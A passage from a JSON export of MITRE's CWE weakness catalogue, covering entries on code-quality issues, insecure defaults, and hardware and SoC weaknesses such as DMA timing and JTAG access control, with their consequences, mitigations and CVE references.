Nesting","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a callable or other code grouping in which\\n\\t\\t\\t\\t\\tthe nesting / branching is too deep.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1125":{"attr":{"@_ID":"1125","@_Name":"Excessive Attack Surface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product has an attack surface whose quantitative\\n\\t\\t\\t\\t\\tmeasurement exceeds a desirable maximum.","Extended_Description":{"xhtml:p":"Originating from software security, an \\"attack surface\\" measure typically reflects the number of input points and output points that can be utilized by an untrusted party, i.e. a potential attacker. A larger attack surface provides more places to attack, and more opportunities for developers to introduce weaknesses. In some cases, this measure may reflect other aspects of quality besides security; e.g., a product with many inputs and outputs may require a large number of tests in order to improve code coverage."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-966"}},{"attr":{"@_External_Reference_ID":"REF-967"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1126":{"attr":{"@_ID":"1126","@_Name":"Declaration of Variable with Unnecessarily Wide Scope","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code declares a variable in one scope, but the\\n\\t\\t\\t\\t\\tvariable is only used within a narrower scope.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1127":{"attr":{"@_ID":"1127","@_Name":"Compilation with Insufficient Warnings or Errors","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is compiled without sufficient warnings enabled, which\\n\\t\\t\\t\\t\\tmay prevent the detection of subtle bugs or quality\\n\\t\\t\\t\\t\\tissues.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Build and Compilation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1164":{"attr":{"@_ID":"1164","@_Name":"Irrelevant Code","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program contains code that is not essential for execution,\\n\\t i.e. makes no state changes and has no side effects that alter\\n\\t data or control flow, such that removal of the code would have no impact\\n\\t to functionality or correctness.","Extended_Description":{"xhtml:p":"Irrelevant code could include dead code,\\n\\t initialization that is not used, empty blocks, code that could be entirely\\n\\t removed due to optimization, etc."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Reduce Reliability"},{"Scope":"Other","Impact":"Reduce Performance"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-02"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1173":{"attr":{"@_ID":"1173","@_Name":"Improper Use of Validation Framework","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not use, or incorrectly uses, an input validation framework that is provided by the source language or an independent library.","Extended_Description":"Many modern coding languages provide developers with input validation frameworks to make the task of input validation easier and less error-prone. These frameworks will automatically check all input against specified criteria and direct execution to error handlers when invalid input is received. The improper use (i.e., an incorrect implementation or missing altogether) of these frameworks is not directly exploitable, but can lead to an exploitable condition if proper input validation is not performed later in the application. Not using provided input validation frameworks can also hurt the maintainability of code as future developers may not recognize the downstream input validation being used in the place of the validation framework.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may occur when software designers choose to not leverage input validation frameworks provided by the source language."},{"Phase":"Implementation","Note":"This weakness may occur when developers do not correctly use a provided input validation framework."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others."}},"Detection_Methods":{"Detection_Method":{"attr":{"@_Detection_Method_ID":"DM-3"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Some instances of improper input validation can be detected using automated static analysis.","A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present.","Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes."]}}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Properly use provided input validation frameworks."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-12-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"1174":{"attr":{"@_ID":"1174","@_Name":"ASP.NET Misconfiguration: Improper Model Validation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The ASP.NET application does not use, or incorrectly uses, the model validation framework.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-12-21"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1176":{"attr":{"@_ID":"1176","@_Name":"Inefficient CPU Computation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program performs CPU computations using\\n algorithms that are not as efficient as they could be for the\\n needs of the developer, i.e., the computations can be\\n optimized further.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly, possibly in ways that are noticeable to the users. If an attacker can influence the amount of computation that must be performed, e.g. by triggering worst-case complexity, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)"},{"Scope":"Other","Impact":"Reduce Performance"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1008"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1177":{"attr":{"@_ID":"1177","@_Name":"Use of Prohibited Code","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a function, library, or third party component\\n\\t that has been explicitly prohibited, whether by the developer or\\n\\t the customer.","Extended_Description":{"xhtml:p":["The developer - or customers - may wish to restrict or eliminate use of a function, library, or third party component for any number of reasons, including real or suspected vulnerabilities; difficulty to use securely; export controls or license requirements; obsolete or poorly-maintained code; internal code being scheduled for deprecation; etc.","To reduce risk of vulnerabilities, the developer might maintain a list of \\"banned\\" functions that programmers must avoid using because the functions are difficult or impossible to use securely. This issue can also make the software more costly and difficult to maintain."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1009"}},{"attr":{"@_External_Reference_ID":"REF-1010"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}}},"1187":{"attr":{"@_ID":"1187","@_Name":"DEPRECATED: Use of Uninitialized Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-908. All content has been transferred to CWE-908.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-03-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type, Weakness_Ordinalities"},"Previous_Entry_Name":{"#text":"Use of Uninitialized Resource","attr":{"@_Date":"2020-02-24"}}}},"1188":{"attr":{"@_ID":"1188","@_Name":"Insecure Default Initialization of Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software initializes or sets a resource with a default that is intended to be changed by the administrator, but the default is not secure.","Extended_Description":{"xhtml:p":"Developers often choose default values that leave the software as open and easy to use as possible out-of-the-box, under the assumption that the administrator can (or should) change the default value. However, this ease-of-use comes at a cost when the default is insecure and the administrator does not change it."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"665"}}},"Notes":{"Note":{"#text":"This entry improves organization of concepts under initialization. The typical CWE model is to cover \\"Missing\\" and \\"Incorrect\\" behaviors. Arguably, this entry could be named as \\"Incorrect\\" instead of \\"Insecure.\\" This might be changed in the near future.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-03-25"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1189":{"attr":{"@_ID":"1189","@_Name":"Improper Isolation of Shared Resources on System-on-a-Chip (SoC)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The System-On-a-Chip (SoC) does not properly isolate shared resources between trusted and untrusted agents.","Extended_Description":{"xhtml:p":"A System-On-a-Chip (SoC) has a lot of functionality, but it may have a limited number of pins or pads. A pin can only perform one function at a time. However, it can be configured to perform multiple different functions. This technique is called pin multiplexing. Similarly, several resources on the chip may be shared to multiplex and support different features or functions. When such resources are shared between trusted and untrusted agents, untrusted agents may be able to access the assets intended to be accessed only by the trusted agents."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"653","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1331","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If resources being used by a trusted user are shared with an untrusted user, the untrusted user may be able to modify the functionality of the shared resource of the trusted user."},{"Scope":"Integrity","Impact":"Quality Degradation","Note":"The functionality of the shared resource may be intentionally degraded."}]},"Detection_Methods":{"Detection_Method":{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"Kernel integrity verification can help identify when shared resource configuration settings have been modified."},"Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["When sharing resources, avoid mixing agents of varying trust levels.","Untrusted agents should not share resources with trusted agents."]}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the following SoC\\n\\t design. The Hardware Root of Trust (HRoT) local SRAM is memory mapped in the core{0-N}\\n\\t address space. The HRoT allows or disallows access to private memory ranges, thus\\n\\t allowing the sram to function as a mailbox for communication between untrusted and\\n\\t trusted HRoT partitions.","Body_Text":{"xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/HRoT-CWE.png","@_alt":"Hardware Root of Trust"}},"xhtml:p":"We assume that the threat is from malicious software in\\n\\t the untrusted domain. We assume this software has access\\n\\t to the core{0-N} memory map and can be running at any\\n\\t privilege level on the untrusted cores. The capability\\n\\t of this threat in this example is communication to and\\n\\t from the mailbox region of SRAM modulated by the\\n\\t hrot_iface. To address this threat, information must not\\n\\t enter or exit the shared region of SRAM through\\n\\t hrot_iface when in secure or privileged mode."}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-6260","Description":"Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC\'s physical address space from the host, and possibly the network [REF-1138].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"124"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1036"}},{"attr":{"@_External_Reference_ID":"REF-1138"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-07-16","Contribution_Comment":"Provided Demonstrative Example for Hardware Root of Trust"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided observed example"}],"Previous_Entry_Name":{"#text":"Improper Isolation of Shared Resources on System-on-Chip (SoC)","attr":{"@_Date":"2020-08-20"}}}},"1190":{"attr":{"@_ID":"1190","@_Name":"DMA Device Enabled Too Early in Boot Phase","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product enables a Direct Memory Access (DMA) capable device before the security configuration settings are established, which allows an attacker to extract data from or gain privileges on the product.","Extended_Description":{"xhtml:p":"DMA is included in a number of devices because it allows\\n data transfer between the computer and the connected device, using\\n direct hardware access to read or write directly to main memory\\n without any OS interaction. An attacker could exploit this to\\n access secrets. Several virtualization-based mitigations have been introduced to thwart DMA attacks. These are usually\\n configured/setup during boot time. However, certain IPs that are\\n powered up before boot is complete (known as early boot IPs) may\\n be DMA capable. Such IPs, if not trusted, could launch DMA\\n attacks and gain access to assets that should otherwise be\\n protected."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Modify Memory"],"Likelihood":"High","Note":"DMA devices have direct write access to main memory and\\n due to time of attack will be able to bypass OS or Bootloader\\n access control."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Utilize an IOMMU to orchestrate IO access from\\n the start of the boot process."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1038"}},{"attr":{"@_External_Reference_ID":"REF-1039"}},{"attr":{"@_External_Reference_ID":"REF-1040"}},{"attr":{"@_External_Reference_ID":"REF-1041"}},{"attr":{"@_External_Reference_ID":"REF-1042"}},{"attr":{"@_External_Reference_ID":"REF-1044"}},{"attr":{"@_External_Reference_ID":"REF-1046"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1191":{"attr":{"@_ID":"1191","@_Name":"On-Chip Debug and Test Interface With Improper Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The chip does not implement or does not correctly perform access control to check whether users are authorized to access internal registers and test modes through the physical debug/test interface.","Extended_Description":{"xhtml:p":["A device\'s internal information may be accessed through a scan chain of interconnected internal registers, usually through a JTAG interface. The JTAG interface provides access to these registers in a serial fashion in the form of a scan chain for the purposes of debugging programs running on a device. Since almost all information contained within a device may be accessed over this interface, device manufacturers typically insert some form of authentication and authorization to prevent unintended use of this sensitive information. This mechanism is implemented in addition to on-chip protections that are already present.","If authorization, authentication, or some other form of access control is not implemented or not implemented correctly, a user may be able to bypass on-chip protection mechanisms through the debug interface."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Likelihood":"High"},{"Scope":"Confidentiality","Impact":"Read Memory","Likelihood":"High"},{"Scope":"Authorization","Impact":"Execute Unauthorized Code or Commands","Likelihood":"High"},{"Scope":"Integrity","Impact":"Modify Memory","Likelihood":"High"},{"Scope":"Integrity","Impact":"Modify Application Data","Likelihood":"High"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High"}]},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"Authentication and authorization of debug and test interfaces should be part of the architecture and design review process. Withholding of private register documentation from the debug and test interface public specification (\\"Security by obscurity\\") should not be considered as sufficient security."}},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"Dynamic tests should be done in the pre-silicon and post-silicon stages to verify that the debug and test interfaces are not open by default."}},{"Method":"Fuzzing","Description":"Tests that fuzz Debug and Test Interfaces should ensure that no access without appropriate authentication and authorization is possible.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"If feasible, the manufacturer should disable the JTAG interface or implement authentication and authorization for the JTAG interface. If authentication logic is added, it should be resistant to timing attacks. Security-sensitive data stored in registers, such as keys, etc. should be cleared when entering debug mode.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A home, WiFi-router device implements a login prompt which prevents an unauthorized user from issuing any commands on the device until appropriate credentials are provided. The credentials are protected on the device and are checked for strength against attack.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["If the JTAG interface on this device is not hidden by the manufacturer, the interface may be identified using tools such as JTAGulator. If it is hidden but not disabled, it can be exposed by physically wiring to the board.",{"#text":"By issuing acommand before the OS starts, the unauthorized user pauses the watchdog timer and prevents the router from restarting (once the watchdog timer would have expired). Having paused the router, an unauthorized user is able to execute code and inspect and modify data in the device, even extracting all of the router\'s firmware. This allows the user to examine the router and potentially exploit it.","xhtml:b":"halt"}]},{"#text":"In order to prevent exposing the debugging interface, manufacturers might try to obfuscate the JTAG interface or blow device internal fuses to disable the JTAG interface. Adding authentication and authorization to this interface makes use by unauthorized individuals much more difficult.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":"JTAG is useful to chip and device manufacturers during design, testing, and production and is included in nearly every product. Without proper authentication and authorization, the interface may allow tampering with a product."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-18827","Description":"chain: JTAG interface is not disabled (CWE-1191) during ROM code execution, introducing a race condition (CWE-362) to extract encryption keys","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1037"}},{"attr":{"@_External_Reference_ID":"REF-1043"}},{"attr":{"@_External_Reference_ID":"REF-1084"}},{"attr":{"@_External_Reference_ID":"REF-1085"}}]},"Notes":{"Note":{"#text":"CWE-1191 and CWE-1244 both involve physical debug access,\\n\\t but the weaknesses are different. CWE-1191 is effectively\\n\\t about missing authorization for a debug interface,\\n\\t i.e. JTAG. CWE-1244 is about providing internal assets with\\n\\t the wrong debug access level, exposing the asset to\\n\\t untrusted debug agents.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Name":"Parbati K. Manna","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-18","Contribution_Comment":"provided detection methods"},{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"reviewed content changes"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"clarified differences between CWE-1191 and CWE-1244"}],"Previous_Entry_Name":[{"#text":"Exposed Chip Debug Interface With Insufficient Access Control","attr":{"@_Date":"2020-02-26"}},{"#text":"Exposed Chip Debug and or Test Interface With Insufficient Access Control","attr":{"@_Date":"2020-08-20"}}]}},"1192":{"attr":{"@_ID":"1192","@_Name":"System-on-Chip (SoC) Using Components without Unique, Immutable Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The System-on-Chip (SoC) does not have unique, immutable identifiers for each of its components.","Extended_Description":{"xhtml:p":["A System-on-Chip (SoC) comprises several components (IP) with varied\\n trust requirements. It is required that each IP is identified\\n uniquely and should distinguish itself from other entities in\\n the SoC without any ambiguity. The unique secured identity is\\n required for various purposes. Most of the time the identity is used\\n to route a transaction or perform certain actions, including \\n resetting, retrieving a sensitive information, and acting upon or on\\n behalf of something else.","There are several variants of this weakness:"],"xhtml:ul":{"xhtml:li":["A \\"missing\\" identifier is when the SoC does not define\\n\\t any mechanism to uniquely identify the IP.","An \\"insufficient\\" identifier might provide\\n\\t some defenses - for example, against the most common\\n\\t attacks - but it does not protect against everything\\n\\t that is intended.","A \\"misconfigured\\" mechanism occurs when a mechanism\\n is available but not implemented correctly.","An \\"ignored\\" identifier occurs when the SoC/IP has not applied\\n\\t any policies or does not act upon the identifier securely."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":"Every identity generated in the SoC should be unique and\\n immutable in hardware. The actions that an IP is trusted or\\n not trusted should be clearly defined, implemented,\\n configured, and tested. If the definition is implemented via 